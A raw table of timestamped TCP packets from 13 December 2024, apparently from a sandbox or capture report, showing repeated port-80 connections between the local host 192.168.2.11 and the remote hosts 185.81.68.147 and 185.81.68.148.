                                                                                                                                                                                                Dec 13, 2024 08:21:25.345237970 CET5011880192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:25.345268011 CET5011480192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:25.372050047 CET5011880192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:25.419903040 CET5011680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:25.420224905 CET5011980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:25.492146969 CET8050118185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:25.540007114 CET8050119185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:25.540124893 CET5011980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:25.540165901 CET8050116185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:25.540261030 CET5011680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:25.573188066 CET5011980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:25.693020105 CET8050119185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:25.694834948 CET8050117185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:25.694916964 CET8050117185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:25.694976091 CET5011780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:25.696306944 CET5011780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:25.809801102 CET5012080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:25.816052914 CET8050117185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:25.929900885 CET8050120185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:25.930139065 CET5012080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:25.930139065 CET5012080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:26.050570965 CET8050120185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:26.050694942 CET5012080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:26.170476913 CET8050120185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:26.705961943 CET8050118185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:26.706060886 CET5011880192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:26.894267082 CET8050119185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:26.894418955 CET5011980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:27.416011095 CET8050120185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:27.416090012 CET8050120185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:27.416145086 CET5012080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:27.418011904 CET5012080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:27.529633999 CET5012180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:27.539690971 CET8050120185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:27.651501894 CET8050121185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:27.651590109 CET5012180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:27.651650906 CET5012180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:27.771517038 CET8050121185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:27.771655083 CET5012180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:27.891751051 CET8050121185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:28.715873003 CET5011980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:28.716185093 CET5012280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:28.716268063 CET5011880192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:28.716530085 CET5012380192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:28.841231108 CET8050119185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:28.841382027 CET8050122185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:28.841391087 CET5011980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:28.841456890 CET5012280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:28.841533899 CET8050123185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:28.841594934 CET5012380192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:28.843250990 CET5012280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:28.843848944 CET5012380192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:28.844069004 CET8050118185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:28.844151974 CET5011880192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:28.963016987 CET8050122185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:28.963598013 CET8050123185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:28.989801884 CET4997380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:28.989840984 CET4998380192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:29.160310030 CET8050121185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:29.160548925 CET8050121185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:29.160644054 CET5012180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:29.161757946 CET5012180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:29.262742996 CET5012480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:29.281580925 CET8050121185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:29.382878065 CET8050124185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:29.383019924 CET5012480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:29.383090973 CET5012480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:29.502893925 CET8050124185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:29.503038883 CET5012480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:29.623009920 CET8050124185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:30.189109087 CET8050122185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:30.189196110 CET5012280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:30.189574003 CET8050123185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:30.189630032 CET5012380192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:30.911148071 CET8050124185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:30.911232948 CET8050124185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:30.911289930 CET5012480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:30.912652016 CET5012480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:31.028765917 CET5012580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:31.032357931 CET8050124185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:31.149040937 CET8050125185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:31.149133921 CET5012580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:31.149205923 CET5012580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:31.269145012 CET8050125185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:31.269228935 CET5012580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:31.389024973 CET8050125185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:31.716990948 CET5012380192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:31.717264891 CET5012680192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:31.722558022 CET5012280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:31.722820997 CET5012780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:31.837192059 CET8050126185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:31.837312937 CET5012680192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:31.837419987 CET8050123185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:31.837485075 CET5012380192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:31.842557907 CET8050122185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:31.842572927 CET8050127185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:31.842645884 CET5012280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:31.842708111 CET5012780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:31.863146067 CET5012680192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:31.863267899 CET5012780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:31.982942104 CET8050126185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:31.982980013 CET8050127185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:32.602518082 CET8050125185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:32.602650881 CET8050125185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:32.602741957 CET5012580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:32.623630047 CET5012580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:32.735208988 CET5012880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:32.743472099 CET8050125185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:32.855407953 CET8050128185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:32.855506897 CET5012880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:32.863410950 CET5012880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:32.983170033 CET8050128185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:32.983257055 CET5012880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:33.103123903 CET8050128185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:33.179265022 CET8050126185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:33.179320097 CET5012680192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:33.205146074 CET8050127185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:33.205209970 CET5012780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:34.300467014 CET8050128185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:34.300606966 CET8050128185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:34.300663948 CET5012880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:34.301929951 CET5012880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:34.403278112 CET5012980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:34.421631098 CET8050128185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:34.523109913 CET8050129185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:34.523284912 CET5012980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:34.523339033 CET5012980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:34.643059969 CET8050129185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:34.643157959 CET5012980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:34.762859106 CET8050129185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:34.848484993 CET5012680192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:34.848782063 CET5013080192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:34.848881960 CET5012780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:34.849066019 CET5013180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:34.968663931 CET8050130185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:34.968764067 CET8050131185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:34.968805075 CET5013080192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:34.968842030 CET5013180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:34.968909025 CET8050126185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:34.968971968 CET5012680192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:34.969515085 CET8050127185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:34.969577074 CET5012780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:34.979630947 CET5013080192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:34.979758978 CET5013180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:35.099445105 CET8050130185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:35.099523067 CET8050131185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:35.956402063 CET8050129185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:35.956547022 CET8050129185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:35.956657887 CET5012980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:35.961492062 CET5012980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:36.075031996 CET5013280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:36.081432104 CET8050129185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:36.194967985 CET8050132185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:36.195058107 CET5013280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:36.195107937 CET5013280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:36.315062046 CET8050132185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:36.315078020 CET8050130185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:36.315145016 CET5013080192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:36.315146923 CET5013280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:36.315495968 CET8050131185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:36.315558910 CET5013180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:36.434951067 CET8050132185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:37.808267117 CET8050132185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:37.808670044 CET8050132185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:37.808732033 CET5013280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:37.809787035 CET5013280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:37.886181116 CET5013180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:37.886471033 CET5013380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:37.900616884 CET5013080192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:37.900871038 CET5013480192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:37.918994904 CET5013580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:37.929533005 CET8050132185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:38.006248951 CET8050133185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:38.006304979 CET8050131185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:38.006344080 CET5013380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:38.006372929 CET5013180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:38.020584106 CET8050134185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:38.020678997 CET5013480192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:38.020740032 CET8050130185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:38.020788908 CET5013080192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:38.026662111 CET5013380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:38.026817083 CET5013480192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:38.038839102 CET8050135185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:38.038937092 CET5013580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:38.039016008 CET5013580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:38.146558046 CET8050133185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:38.146603107 CET8050134185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:38.158830881 CET8050135185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:38.158890963 CET5013580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:38.278736115 CET8050135185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:39.381045103 CET8050133185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:39.381057024 CET8050134185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:39.381177902 CET5013380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:39.383694887 CET5013480192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:39.653225899 CET8050135185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:39.653285980 CET8050135185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:39.653367996 CET5013580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:39.654766083 CET5013580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:39.762622118 CET5013680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:39.774638891 CET8050135185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:39.884919882 CET8050136185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:39.885255098 CET5013680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:39.885343075 CET5013680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:40.005122900 CET8050136185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:40.005244970 CET5013680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:40.127295017 CET8050136185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:41.072444916 CET5013380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:41.085078955 CET5013780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:41.085599899 CET5013480192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:41.086035013 CET5013880192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:41.192735910 CET8050133185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:41.192853928 CET5013380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:41.205013990 CET8050137185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:41.205141068 CET5013780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:41.205599070 CET8050134185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:41.205668926 CET5013480192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:41.205720901 CET8050138185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:41.205777884 CET5013880192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:41.252058029 CET5013780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:41.255717039 CET5013880192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:41.358017921 CET8050136185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:41.358058929 CET8050136185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:41.358165026 CET5013680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:41.359520912 CET5013680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:41.371925116 CET8050137185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:41.375555992 CET8050138185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:41.473649025 CET5013980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:41.479327917 CET8050136185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:41.593630075 CET8050139185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:41.593864918 CET5013980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:41.593864918 CET5013980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:41.713706017 CET8050139185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:41.713785887 CET5013980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:41.833568096 CET8050139185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:42.536329985 CET8050137185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:42.536448956 CET5013780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:42.537601948 CET8050138185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:42.537668943 CET5013880192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:43.035608053 CET8050139185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:43.035643101 CET8050139185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:43.036922932 CET5013980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:43.037286997 CET5013980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:43.153137922 CET5014080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:43.156963110 CET8050139185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:43.273045063 CET8050140185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:43.276988029 CET5014080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:43.277054071 CET5014080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:43.396867990 CET8050140185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:43.397013903 CET5014080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:43.517134905 CET8050140185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:44.696682930 CET5013780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:44.696985006 CET5014180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:44.718907118 CET5013880192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:44.719201088 CET5014280192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:44.816817045 CET8050141185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:44.816888094 CET5014180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:44.816998959 CET8050137185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:44.817269087 CET5013780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:44.838896990 CET8050142185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:44.838939905 CET5014180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:44.839039087 CET8050138185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:44.839124918 CET5013880192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:44.844825983 CET5014280192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:44.851973057 CET5014280192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:44.896039009 CET8050140185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:44.896100998 CET8050140185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:44.896152020 CET5014080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:44.897520065 CET5014080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:44.958770990 CET8050141185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:44.971947908 CET8050142185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:45.012537956 CET5014380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:45.017220974 CET8050140185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:45.133744001 CET8050143185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:45.133821964 CET5014380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:45.134252071 CET5014380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:45.253835917 CET8050143185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:45.253920078 CET5014380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:45.373673916 CET8050143185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:46.174334049 CET8050141185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:46.176557064 CET5014180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:46.205142975 CET8050142185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:46.208976984 CET5014280192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:46.777579069 CET8050143185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:46.777599096 CET8050143185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:46.777654886 CET5014380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:46.780229092 CET5014380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:46.887546062 CET5014480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:46.899988890 CET8050143185.81.68.147192.168.2.11
